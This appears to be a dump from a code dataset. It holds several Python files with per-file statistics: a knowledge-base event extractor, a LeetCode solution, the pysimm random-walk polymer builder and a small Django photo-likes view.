events = defaultdict(lambda: dict())
type_look_up_table = {}
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if fields[1] == 'type':
type_look_up_table[fields[0]] = fields[2][:-1]
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if 'mention' in fields[1]:
if fields[0][1:6] != 'Event': continue
# type
events[fields[0][1:] + ':' + fields[3]]['type'] = type_look_up_table[fields[0]]
# text
events[fields[0][1:] + ':' + fields[3]]['text'] = fields[2]
# doc
events[fields[0][1:] + ':' + fields[3]]['doc'] = re.split(':', fields[3])[0]
# # Date --> not serializable, there are some tricks, but I prefer to use the doc id later.
# if len(re.split('_', re.split(':', fields[3])[0])) == 5:
# temporal_info = re.split('_', re.split(':', fields[3])[0])[3]
# # NYT Exception
# elif re.split(':', fields[3])[0][0:3] == 'NYT':
# temporal_info = re.split('_', re.split(':', fields[3])[0])[2][0:8]
# event_date = datetime.strptime(temporal_info, '%Y%m%d')
# events[fields[0][1:] + ':' + fields[3]]['date'] = event_date
# entities
events[fields[0][1:] + ':' + fields[3]]['STR_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['PER_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['ORG_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['GPE_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['LOC_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['FAC_entities'] = []
# finding entities #
elif fields[2].startswith(':Entity'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
entity_type = entity_strings[fields[2]]['type'] + '_entities'
events[event][entity_type].append(entity_strings[fields[2]]['selected_string'])
elif fields[2].startswith(':String'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
events[event]['STR_entities'].append(string_strings[fields[2]]['selected_string'])
with open(path_to_output, 'w') as output:
json.dump(events, output)
if __name__ == '__main__':
main(sys.argv[1:])
| 36.040404 | 242 | 0.633688 | import re
import sys
import json
import getopt
import collections
from datetime import datetime
from collections import defaultdict
JSON file, usage: python extract_events.py -i <inputfile> -e <entitystringsfile> -s <stringstringsfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-e", "--efile"):
entity_strings = arg
elif opt in ("-s", "--sfile"):
string_strings = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
extract_events(inputfile, outputfile, entity_strings, string_strings)
def extract_events(path_to_KB_file, path_to_output, path_to_entity_strings, path_to_string_strings):
entity_strings = json.load(open(path_to_entity_strings))
string_strings = json.load(open(path_to_string_strings))
events = defaultdict(lambda: dict())
type_look_up_table = {}
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if fields[1] == 'type':
type_look_up_table[fields[0]] = fields[2][:-1]
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if 'mention' in fields[1]:
if fields[0][1:6] != 'Event': continue
# type
events[fields[0][1:] + ':' + fields[3]]['type'] = type_look_up_table[fields[0]]
# text
events[fields[0][1:] + ':' + fields[3]]['text'] = fields[2]
# doc
events[fields[0][1:] + ':' + fields[3]]['doc'] = re.split(':', fields[3])[0]
# # Date --> not serializable, there are some tricks, but I prefer to use the doc id later.
# if len(re.split('_', re.split(':', fields[3])[0])) == 5:
# temporal_info = re.split('_', re.split(':', fields[3])[0])[3]
# # NYT Exception
# elif re.split(':', fields[3])[0][0:3] == 'NYT':
# temporal_info = re.split('_', re.split(':', fields[3])[0])[2][0:8]
# event_date = datetime.strptime(temporal_info, '%Y%m%d')
# events[fields[0][1:] + ':' + fields[3]]['date'] = event_date
# entities
events[fields[0][1:] + ':' + fields[3]]['STR_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['PER_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['ORG_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['GPE_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['LOC_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['FAC_entities'] = []
# finding entities #
elif fields[2].startswith(':Entity'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
entity_type = entity_strings[fields[2]]['type'] + '_entities'
events[event][entity_type].append(entity_strings[fields[2]]['selected_string'])
elif fields[2].startswith(':String'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
events[event]['STR_entities'].append(string_strings[fields[2]]['selected_string'])
with open(path_to_output, 'w') as output:
json.dump(events, output)
if __name__ == '__main__':
main(sys.argv[1:])
| true | true |
f72eb4628f805442a54c0a5abe345ae985fd1cad | 833 | py | Python | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-08-27T11:28:03.000Z | 2020-12-24T07:10:22.000Z | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | null | null | null | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-09-20T09:44:01.000Z | 2020-12-24T07:10:23.000Z | """
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.36
工具: python == 3.7.3
"""
"""
思路:
代码简单,但是关键是理解题意:
注意题目中的独有两个字:
s1 = 'ab',s2 = 'a',因为ab是s1独有,所以最长子序列为ab;
s1 = 'ab', s2 = 'ab', 因为ab是两个串都有,ab排除,a也是两个串都有,排除,b也是两个串都有,排除。所以最长特殊序列不存在,返回-1;
通过以上分析,我们可以得出结论,如果:两个串相等(不仅长度相等,内容也相等),那么他们的最长特殊序列不存在。返回-1;
如果两个串长度不一样,那么长的串 永远也不可能是 短串的子序列,即len(s1) > len(s2),则最长特殊序列为s1,返回长度大的数。
结果:
执行用时 : 48 ms, 在所有 Python3 提交中击败了75%的用户
内存消耗 : 13.7 MB, 在所有 Python3 提交中击败了6.40%的用户
"""
class Solution:
def findLUSlength(self, a, b):
if a == b:
return -1
else:
return len([a if len(a) > len(b) else b][0])
if __name__ == "__main__":
a = "aba"
b = "cdc"
answer = Solution().findLUSlength(a, b)
print(answer)
| 22.513514 | 87 | 0.593037 |
class Solution:
def findLUSlength(self, a, b):
if a == b:
return -1
else:
return len([a if len(a) > len(b) else b][0])
if __name__ == "__main__":
a = "aba"
b = "cdc"
answer = Solution().findLUSlength(a, b)
print(answer)
| true | true |
f72eb54af7802f9a7de3342afa34f50fbf810d29 | 13,415 | py | Python | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | # ******************************************************************************
# pysimm.apps.random_walk module
# ******************************************************************************
#
# psuedo random walk algorithm written using pysimm tools
#
# ******************************************************************************
# License
# ******************************************************************************
# The MIT License (MIT)
#
# Copyright (c) 2016 Michael E. Fortunato, Coray M. Colina
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from time import strftime
from itertools import permutations, izip
import numpy as np
from pysimm import system, lmps, forcefield, calc
from pysimm import error_print
def find_last_backbone_vector(s, m):
    """pysimm.apps.random_walk.find_last_backbone_vector

    Compute the head-minus-tail displacement of the most recently added
    monomer in system ``s``, i.e. of the last ``m.particles.count``
    particles.

    Args:
        s: :class:`~pysimm.system.System` object
        m: :class:`~pysimm.system.System` object (reference monomer)

    Returns:
        list of three vector components (head - tail); a linker that is
        never found contributes the origin [0, 0, 0]
    """
    head = [0, 0, 0]
    tail = [0, 0, 0]
    last_monomer = s.particles[-1 * m.particles.count:]
    for particle in last_monomer:
        coords = [particle.x, particle.y, particle.z]
        if particle.linker == 'head':
            head = coords
        elif particle.linker == 'tail':
            tail = coords
    return [h - t for h, t in zip(head, tail)]
def copolymer(m, nmon, s_=None, **kwargs):
    """pysimm.apps.random_walk.copolymer
    Builds copolymer using random walk methodology using pattern
    Args:
        m: list of reference monomer :class:`~pysimm.system.System`s
        nmon: total number of monomers to add to chain
        s_: :class:`~pysimm.system.System` in which to build polymer chain (None)
        settings: dictionary of simulation settings
        density: density at which to build polymer (0.3)
        forcefield: :class:`~pysimm.forcefield.Forcefield` object to acquire new force field parameters
        capped: True/False if monomers are capped
        unwrap: True to unwrap final system
        traj: True to build xyz trajectory of polymer growth (True)
        pattern: list of pattern for monomer repeat units, should match length of m ([1 for _ in range(len(m))])
        limit: during MD, limit atomic displacement by this max value (LAMMPS ONLY)
        sim: :class:`~pysimm.lmps.Simulation` object for relaxation between polymer growth
    Returns:
        new copolymer :class:`~pysimm.system.System`
    """
    # Work on copies so the caller's reference monomers are never mutated.
    m = [x.copy() for x in m]
    settings = kwargs.get('settings', {})
    density = kwargs.get('density', 0.3)
    f = kwargs.get('forcefield')
    capped = kwargs.get('capped')
    unwrap = kwargs.get('unwrap')
    traj = kwargs.get('traj', True)
    pattern = kwargs.get('pattern', [1 for _ in range(len(m))])
    limit = kwargs.get('limit', 0.1)
    sim = kwargs.get('sim')
    # Tag head/tail linker particles from the '@'-style type-name convention.
    # NOTE(review): str.find() returns -1 when absent (truthy) and 0 at the
    # start (falsy), so 'head' matches prefixes that do NOT begin with 'H'
    # and 'tail' those that do not begin with 'T' -- confirm the intended
    # tagging convention upstream.
    for m_ in m:
        m_.add_particle_bonding()
        for p in m_.particles:
            if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
                p.linker = 'head'
            elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
                p.linker = 'tail'
        m_.remove_linker_types()
    # Seed the box with a single monomer of the first type in m.
    if s_ is None:
        s = system.replicate(m[0], 1, density=density/nmon)
    else:
        s = system.replicate(m[0], 1, s_=s_, density=density/nmon)
    print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
    for p in s.particles:
        if p.linker == 'head':
            last_head = p
        elif p.linker == 'tail':
            last_tail = p
    for m_ in m:
        if capped:
            # Drop the capping particle so the growing chain ends stay open.
            m_.particles.remove(1)
            m_.remove_spare_bonding()
            m_.add_particle_bonding()
    s.add_particle_bonding()
    if traj:
        s.write_xyz('random_walk.xyz')
    temp_nmon = 1
    while True:
        # Rotate through monomer types / repeat counts in pattern order.
        m_ = m.pop(0)
        m.append(m_)
        p_ = pattern.pop(0)
        pattern.append(p_)
        if temp_nmon == 1 and p_ == 1:
            # First monomer is already in the box; advance to the next type.
            m_ = m.pop(0)
            m.append(m_)
            p_ = pattern.pop(0)
            pattern.append(p_)
        elif temp_nmon == 1:
            # First monomer already accounts for one unit of this type.
            p_ -= 1
        for insert in range(p_):
            head = None
            tail = None
            # Direction of the current head->tail backbone; the incoming
            # monomer is aligned to it and offset three backbone lengths.
            backbone_vector = np.array([last_head.x - last_tail.x,
                                        last_head.y - last_tail.y,
                                        last_head.z - last_tail.z])
            ref_head = None
            ref_tail = None
            for p in m_.particles:
                if p.linker == 'head':
                    ref_head = p
                elif p.linker == 'tail':
                    ref_tail = p
            if ref_head and ref_tail:
                ref_backbone_vector = np.array([ref_head.x - ref_tail.x,
                                                ref_head.y - ref_tail.y,
                                                ref_head.z - ref_tail.z])
                # Rigid-body rotate the new monomer to match the chain
                # direction, then translate it past the current chain end.
                rot_matrix = calc.find_rotation(ref_backbone_vector, backbone_vector)
                m_.rotate(around=ref_tail, rot_matrix=rot_matrix)
                translation_vector = [last_tail.x - ref_tail.x,
                                      last_tail.y - ref_tail.y,
                                      last_tail.z - ref_tail.z]
                for p in m_.particles:
                    p.x = p.x + translation_vector[0] + 3*backbone_vector[0]
                    p.y = p.y + translation_vector[1] + 3*backbone_vector[1]
                    p.z = p.z + translation_vector[2] + 3*backbone_vector[2]
            else:
                print('reference molecule has no head or tail')
            n = m_.copy()
            if capped:
                # Remove the cap from the current chain end before bonding.
                s.particles.remove(s.particles.count)
                s.remove_spare_bonding()
                s.add_particle_bonding()
            s.add(n, change_dim=False)
            s.add_particle_bonding()
            head = last_head
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tail = p
            s.make_new_bonds(head, tail, f)
            temp_nmon += 1
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), temp_nmon, nmon))
            if unwrap:
                s.unwrap()
            # Relax the grown chain: limited-displacement NVE MD followed
            # by a minimization, either user-supplied sim or a default one.
            if sim is None:
                sim = lmps.Simulation(s, name='relax_%03d' % (temp_nmon), log='relax.log', **settings)
                sim.add_md(ensemble='nve', limit=limit, **settings)
                sim.add_min(**settings)
            if isinstance(sim, lmps.Simulation):
                sim.system = s
                sim.name = 'relax_%03d' % (temp_nmon)
                sim.run(np=settings.get('np'))
            if unwrap:
                s.unwrap()
            if unwrap:
                s.wrap()
            # Refresh chain-end references from the just-added monomer.
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'head':
                    last_head = p
                elif p.linker == 'tail':
                    last_tail = p
        if temp_nmon >= nmon:
            break
        if unwrap:
            if not s.unwrap():
                error_print('something went wrong')
                return s
        if traj:
            s.write_xyz('random_walk.xyz', append=True)
        if unwrap:
            s.wrap()
    # Make sure every particle is registered with its molecule before dump.
    for p in s.particles:
        if p not in s.molecules[p.molecule.tag].particles:
            s.molecules[p.molecule.tag].particles.add(p)
    s.write_lammps('polymer.lmps')
    s.unwrap()
    s.write_xyz('polymer.xyz')
    return s
def random_walk(m, nmon, s_=None, **kwargs):
    """pysimm.apps.random_walk.random_walk
    Builds homopolymer using random walk methodology
    Args:
        m: reference monomer :class:`~pysimm.system.System`
        nmon: total number of monomers to add to chain
        s_: :class:`~pysimm.system.System` in which to build polymer chain (None)
        extra_bonds: EXPERIMENTAL, True if making ladder backbone polymer
        settings: dictionary of simulation settings
        density: density at which to build polymer (0.3)
        forcefield: :class:`~pysimm.forcefield.Forcefield` object to acquire new force field parameters
        capped: True/False if monomers are capped
        unwrap: True to unwrap final system
        traj: True to build xyz trajectory of polymer growth (True)
        limit: during MD, limit atomic displacement by this max value (LAMMPS ONLY)
        sim: :class:`~pysimm.lmps.Simulation` object for relaxation between polymer growth
    Returns:
        new polymer :class:`~pysimm.system.System`
    """
    # Work on a copy so the caller's reference monomer is never mutated.
    m = m.copy()
    extra_bonds = kwargs.get('extra_bonds', False)
    settings = kwargs.get('settings', {})
    density = kwargs.get('density', 0.3)
    f = kwargs.get('forcefield')
    capped = kwargs.get('capped')
    unwrap = kwargs.get('unwrap')
    traj = kwargs.get('traj', True)
    limit = kwargs.get('limit', 0.1)
    sim = kwargs.get('sim')
    m.add_particle_bonding()
    # Tag head/tail linker particles from the '@'-style type-name convention.
    # NOTE(review): str.find() is truthy for every index except 0, so 'head'
    # matches prefixes that do NOT begin with 'H' (and 'tail' those that do
    # not begin with 'T') -- confirm the intended convention.
    for p in m.particles:
        if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
            p.linker = 'head'
        elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
            p.linker = 'tail'
    m.remove_linker_types()
    if s_ is None:
        s = system.replicate(m, 1, density=density/nmon)
    else:
        # NOTE(review): density is not applied when growing inside an
        # existing system here, while copolymer() passes density/nmon in the
        # same situation -- confirm which behaviour is intended.
        s = system.replicate(m, 1, s_=s_, density=None)
    print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
    if traj:
        s.write_xyz('random_walk.xyz')
    if capped:
        # Drop the capping particle so the chain ends stay open for bonding.
        m.particles.remove(1)
        m.remove_spare_bonding()
        m.add_particle_bonding()
    for insertion in range(nmon - 1):
        head = None
        tail = None
        # Offset the template monomer three backbone lengths past the
        # current chain end before copying it into the system.
        backbone_vector = np.array(find_last_backbone_vector(s, m))
        for p, p_ in izip(s.particles[-1*m.particles.count:], m.particles):
            p_.x = p.x + 3*backbone_vector[0]
            p_.y = p.y + 3*backbone_vector[1]
            p_.z = p.z + 3*backbone_vector[2]
        n = m.copy()
        if capped:
            # Remove the cap from the current chain end before bonding.
            s.particles.remove(s.particles.count)
            s.remove_spare_bonding()
            s.add_particle_bonding()
        if extra_bonds:
            # Ladder backbone: collect every head linker of the end monomer.
            heads = []
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'head':
                    heads.append(p)
        else:
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'head':
                    head = p
        s.add(n, change_dim=False)
        s.add_particle_bonding()
        if extra_bonds:
            tails = []
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tails.append(p)
        else:
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tail = p
        # Debug aid: report particles that ended up with no bonds.
        for p in s.particles:
            if not p.bonded_to:
                print(p.tag)
        if head and tail:
            s.make_new_bonds(head, tail, f)
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
        elif extra_bonds and len(heads) == len(tails):
            # Pair up heads and tails one-to-one for ladder polymers.
            for h, t in izip(heads, tails):
                s.make_new_bonds(h, t, f)
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
        else:
            print('cannot find head and tail')
        # Relax the grown chain: limited-displacement NVE MD followed by a
        # minimization, either user-supplied sim or a default one.
        if sim is None:
            sim = lmps.Simulation(s, name='relax_%03d' % (insertion+2), log='relax.log', **settings)
            sim.add_md(ensemble='nve', limit=limit, **settings)
            sim.add_min(**settings)
        if isinstance(sim, lmps.Simulation):
            sim.system = s
            sim.name = 'relax_%03d' % (insertion+2)
            sim.run(np=settings.get('np'))
        if unwrap:
            if not s.unwrap():
                error_print('something went wrong')
                return s
        if traj:
            s.write_xyz('random_walk.xyz', append=True)
        if unwrap:
            s.wrap()
    # Make sure every particle is registered with its molecule before dump.
    for p in s.particles:
        if p not in s.molecules[p.molecule.tag].particles:
            s.molecules[p.molecule.tag].particles.add(p)
    s.write_lammps('polymer.lmps')
    s.unwrap()
    s.write_xyz('polymer.xyz')
    return s
| 34.309463 | 112 | 0.547372 |
from time import strftime
from itertools import permutations, izip
import numpy as np
from pysimm import system, lmps, forcefield, calc
from pysimm import error_print
def find_last_backbone_vector(s, m):
    """Return the [x, y, z] head-minus-tail displacement of the last
    ``m.particles.count`` particles of ``s`` (the terminal monomer); a
    linker that is never found contributes the origin [0, 0, 0].
    """
    head_pos = [0, 0, 0]
    tail_pos = [0, 0, 0]
    for p in s.particles[-1*m.particles.count:]:
        if p.linker == 'head':
            head_pos = [p.x, p.y, p.z]
        elif p.linker == 'tail':
            tail_pos = [p.x, p.y, p.z]
    return [head_pos[0] - tail_pos[0], head_pos[1] - tail_pos[1], head_pos[2] - tail_pos[2]]
def copolymer(m, nmon, s_=None, **kwargs):
    """Grow a copolymer of ``nmon`` total monomers by random walk,
    cycling through the reference monomer systems in ``m`` according to
    ``pattern``, relaxing with a short MD run plus minimization after
    each insertion, and return the grown system.
    Recognized kwargs: settings, density, forcefield, capped, unwrap,
    traj, pattern, limit, sim.
    """
    # Work on copies so the caller's reference monomers are never mutated.
    m = [x.copy() for x in m]
    settings = kwargs.get('settings', {})
    density = kwargs.get('density', 0.3)
    f = kwargs.get('forcefield')
    capped = kwargs.get('capped')
    unwrap = kwargs.get('unwrap')
    traj = kwargs.get('traj', True)
    pattern = kwargs.get('pattern', [1 for _ in range(len(m))])
    limit = kwargs.get('limit', 0.1)
    sim = kwargs.get('sim')
    # Tag head/tail linker particles from the '@'-style type names.
    for m_ in m:
        m_.add_particle_bonding()
        for p in m_.particles:
            if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
                p.linker = 'head'
            elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
                p.linker = 'tail'
        m_.remove_linker_types()
    if s_ is None:
        s = system.replicate(m[0], 1, density=density/nmon)
    else:
        s = system.replicate(m[0], 1, s_=s_, density=density/nmon)
    print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
    for p in s.particles:
        if p.linker == 'head':
            last_head = p
        elif p.linker == 'tail':
            last_tail = p
    for m_ in m:
        if capped:
            m_.particles.remove(1)
            m_.remove_spare_bonding()
            m_.add_particle_bonding()
    s.add_particle_bonding()
    if traj:
        s.write_xyz('random_walk.xyz')
    temp_nmon = 1
    while True:
        # Rotate through monomer types / repeat counts in pattern order.
        m_ = m.pop(0)
        m.append(m_)
        p_ = pattern.pop(0)
        pattern.append(p_)
        if temp_nmon == 1 and p_ == 1:
            m_ = m.pop(0)
            m.append(m_)
            p_ = pattern.pop(0)
            pattern.append(p_)
        elif temp_nmon == 1:
            p_ -= 1
        for insert in range(p_):
            head = None
            tail = None
            backbone_vector = np.array([last_head.x - last_tail.x,
                                        last_head.y - last_tail.y,
                                        last_head.z - last_tail.z])
            ref_head = None
            ref_tail = None
            for p in m_.particles:
                if p.linker == 'head':
                    ref_head = p
                elif p.linker == 'tail':
                    ref_tail = p
            if ref_head and ref_tail:
                ref_backbone_vector = np.array([ref_head.x - ref_tail.x,
                                                ref_head.y - ref_tail.y,
                                                ref_head.z - ref_tail.z])
                # Align the new monomer with the chain direction, then
                # translate it three backbone lengths past the chain end.
                rot_matrix = calc.find_rotation(ref_backbone_vector, backbone_vector)
                m_.rotate(around=ref_tail, rot_matrix=rot_matrix)
                translation_vector = [last_tail.x - ref_tail.x,
                                      last_tail.y - ref_tail.y,
                                      last_tail.z - ref_tail.z]
                for p in m_.particles:
                    p.x = p.x + translation_vector[0] + 3*backbone_vector[0]
                    p.y = p.y + translation_vector[1] + 3*backbone_vector[1]
                    p.z = p.z + translation_vector[2] + 3*backbone_vector[2]
            else:
                print('reference molecule has no head or tail')
            n = m_.copy()
            if capped:
                s.particles.remove(s.particles.count)
                s.remove_spare_bonding()
                s.add_particle_bonding()
            s.add(n, change_dim=False)
            s.add_particle_bonding()
            head = last_head
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tail = p
            s.make_new_bonds(head, tail, f)
            temp_nmon += 1
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), temp_nmon, nmon))
            if unwrap:
                s.unwrap()
            # Relax the chain with limited-displacement MD + minimization.
            if sim is None:
                sim = lmps.Simulation(s, name='relax_%03d' % (temp_nmon), log='relax.log', **settings)
                sim.add_md(ensemble='nve', limit=limit, **settings)
                sim.add_min(**settings)
            if isinstance(sim, lmps.Simulation):
                sim.system = s
                sim.name = 'relax_%03d' % (temp_nmon)
                sim.run(np=settings.get('np'))
            if unwrap:
                s.unwrap()
            if unwrap:
                s.wrap()
            # Refresh chain-end references from the just-added monomer.
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'head':
                    last_head = p
                elif p.linker == 'tail':
                    last_tail = p
        if temp_nmon >= nmon:
            break
        if unwrap:
            if not s.unwrap():
                error_print('something went wrong')
                return s
        if traj:
            s.write_xyz('random_walk.xyz', append=True)
        if unwrap:
            s.wrap()
    for p in s.particles:
        if p not in s.molecules[p.molecule.tag].particles:
            s.molecules[p.molecule.tag].particles.add(p)
    s.write_lammps('polymer.lmps')
    s.unwrap()
    s.write_xyz('polymer.xyz')
    return s
def random_walk(m, nmon, s_=None, **kwargs):
    """Grow a homopolymer of ``nmon`` monomers of ``m`` by random walk,
    relaxing with a short MD run plus minimization after each insertion,
    and return the grown system.
    Recognized kwargs: extra_bonds, settings, density, forcefield,
    capped, unwrap, traj, limit, sim.
    """
    # Work on a copy so the caller's reference monomer is never mutated.
    m = m.copy()
    extra_bonds = kwargs.get('extra_bonds', False)
    settings = kwargs.get('settings', {})
    density = kwargs.get('density', 0.3)
    f = kwargs.get('forcefield')
    capped = kwargs.get('capped')
    unwrap = kwargs.get('unwrap')
    traj = kwargs.get('traj', True)
    limit = kwargs.get('limit', 0.1)
    sim = kwargs.get('sim')
    m.add_particle_bonding()
    # Tag head/tail linker particles from the '@'-style type names.
    for p in m.particles:
        if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
            p.linker = 'head'
        elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
            p.linker = 'tail'
    m.remove_linker_types()
    if s_ is None:
        s = system.replicate(m, 1, density=density/nmon)
    else:
        s = system.replicate(m, 1, s_=s_, density=None)
    print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
    if traj:
        s.write_xyz('random_walk.xyz')
    if capped:
        m.particles.remove(1)
        m.remove_spare_bonding()
        m.add_particle_bonding()
    for insertion in range(nmon - 1):
        head = None
        tail = None
        # Place the template monomer three backbone lengths past the end.
        backbone_vector = np.array(find_last_backbone_vector(s, m))
        for p, p_ in izip(s.particles[-1*m.particles.count:], m.particles):
            p_.x = p.x + 3*backbone_vector[0]
            p_.y = p.y + 3*backbone_vector[1]
            p_.z = p.z + 3*backbone_vector[2]
        n = m.copy()
        if capped:
            s.particles.remove(s.particles.count)
            s.remove_spare_bonding()
            s.add_particle_bonding()
        if extra_bonds:
            # Ladder backbone: collect every head linker of the end monomer.
            heads = []
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'head':
                    heads.append(p)
        else:
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'head':
                    head = p
        s.add(n, change_dim=False)
        s.add_particle_bonding()
        if extra_bonds:
            tails = []
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tails.append(p)
        else:
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tail = p
        # Debug aid: report particles that ended up with no bonds.
        for p in s.particles:
            if not p.bonded_to:
                print(p.tag)
        if head and tail:
            s.make_new_bonds(head, tail, f)
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
        elif extra_bonds and len(heads) == len(tails):
            for h, t in izip(heads, tails):
                s.make_new_bonds(h, t, f)
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
        else:
            print('cannot find head and tail')
        # Relax the chain with limited-displacement MD + minimization.
        if sim is None:
            sim = lmps.Simulation(s, name='relax_%03d' % (insertion+2), log='relax.log', **settings)
            sim.add_md(ensemble='nve', limit=limit, **settings)
            sim.add_min(**settings)
        if isinstance(sim, lmps.Simulation):
            sim.system = s
            sim.name = 'relax_%03d' % (insertion+2)
            sim.run(np=settings.get('np'))
        if unwrap:
            if not s.unwrap():
                error_print('something went wrong')
                return s
        if traj:
            s.write_xyz('random_walk.xyz', append=True)
        if unwrap:
            s.wrap()
    for p in s.particles:
        if p not in s.molecules[p.molecule.tag].particles:
            s.molecules[p.molecule.tag].particles.add(p)
    s.write_lammps('polymer.lmps')
    s.unwrap()
    s.write_xyz('polymer.xyz')
    return s
| true | true |
f72eb557881c37baab88b43f249c035716e84b5c | 963 | py | Python | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | from django.db import transaction
from django.http import JsonResponse, HttpResponseNotAllowed
from django.views.decorators.csrf import csrf_exempt
from .models import Photo
def list_photos(request):
    """Return all photos, ordered by unsplash id, as a JSON array.

    Only GET is allowed; any other verb receives a 405 response.
    """
    if request.method == 'GET':
        photos = Photo.objects.all().order_by('unsplash_id')
        # List comprehension instead of map(lambda ...) for clarity.
        return JsonResponse([p.to_dict() for p in photos], safe=False)
    # Bug fix: the original returned the HttpResponseNotAllowed *class*,
    # not an instance; the constructor requires the permitted methods.
    return HttpResponseNotAllowed(['GET'])
@csrf_exempt
def like_photo(request, pk: int):
    """Atomically increment the like counter of photo ``pk`` and return
    the updated photo as JSON.

    Only PATCH is allowed; any other verb receives a 405 response.
    NOTE(review): an unknown pk raises Photo.DoesNotExist (HTTP 500);
    consider get_object_or_404 if 404 is the desired contract.
    """
    if request.method == 'PATCH':
        # transaction.atomic groups the read-modify-write; add_like() is
        # assumed to persist the change -- confirm in the model.
        with transaction.atomic():
            photo = Photo.objects.get(pk=pk)
            photo.add_like()
            return JsonResponse(photo.to_dict())
